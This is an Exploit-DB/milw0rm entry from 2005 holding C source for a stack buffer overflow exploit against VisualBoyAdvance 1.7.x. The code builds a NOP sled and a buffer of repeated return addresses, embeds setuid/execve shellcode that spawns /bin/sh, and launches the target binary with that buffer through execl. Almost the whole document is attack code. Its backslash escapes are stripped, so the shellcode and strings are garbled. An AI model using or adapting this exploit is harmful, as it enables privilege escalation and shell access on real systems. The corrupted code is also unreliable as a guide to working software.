https://www.exploit-db.com/exploits/824

漏洞细节尚未披露

/*
VisualBoyAdvanced 1.7.x BufferOver Flow exploit
VBA - WEBSITE : vba.ngemu.com
Found & coded by Qnix - Qnix[at]bsdmail[dot]org
*/

#include <stdlib.h>

char shellcode[] =
       "x31xc0x31xdbxb0x17xcdx80" /* setuid() */
       "xebx5ax5ex31xc0x88x46x07x31xc0x31xdbxb0x27xcd"
       "x80x85xc0x78x32x31xc0x31xdbx66xb8x10x01xcdx80"
       "x85xc0x75x0fx31xc0x31xdbx50x8dx5ex05x53x56xb0"
       "x3bx50xcdx80x31xc0x8dx1ex89x5ex08x89x46x0cx50"
       "x8dx4ex08x51x56xb0x3bx50xcdx80x31xc0x8dx1ex89"
       "x5ex08x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0c"
       "xcdx80xe8xa1xffxffxffx2fx62x69x6ex2fx73x68";


unsigned long sp(void)
{ __asm__("movl %esp, %eax");}

int main(int argc, char *argv[])
{
  int i, offset;
  long esp, ret, *addr_ptr;
  char *buffer, *ptr;

  offset = 0;
  esp = sp();
  ret = esp - offset;

if (argc >= 2) {
printf("n ************************************************ n");
printf(" VisualBoyAdvanced 1.7.x BufferOver Flow exploit n");
printf("            by Qnix[at]bsdmail[dot]org      ");
printf("n ************************************************ nn");
printf("[~] Stack pointer (ESP) : 0x%xn", esp);
printf("[~] Offset from ESP     : 0x%xn", offset);
printf("[~] Desired Return Addr : 0x%xnn", ret);
} else {
printf("n ************************************************ n");
printf(" VisualBoyAdvanced 1.7.x BufferOver Flow Exploit n");
printf("            by Qnix[at]bsdmail[dot]org      ");
printf("n ************************************************ nn");
printf("useage : ./vba-exp <VisualBoyAdvanced File> nn");
}

buffer = malloc(2300);

ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 2300; i+=4)
{ *(addr_ptr++) = ret; }

for(i=0; i < 1900; i++)
{ buffer[i] = 'x90'; }

ptr = buffer + 1900;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }

buffer[2300-1] = 0;

execl(argv[1],"VisualBoyAdvance",buffer,0);

free(buffer);

  return 0;
}

// milw0rm.com [2005-09-13]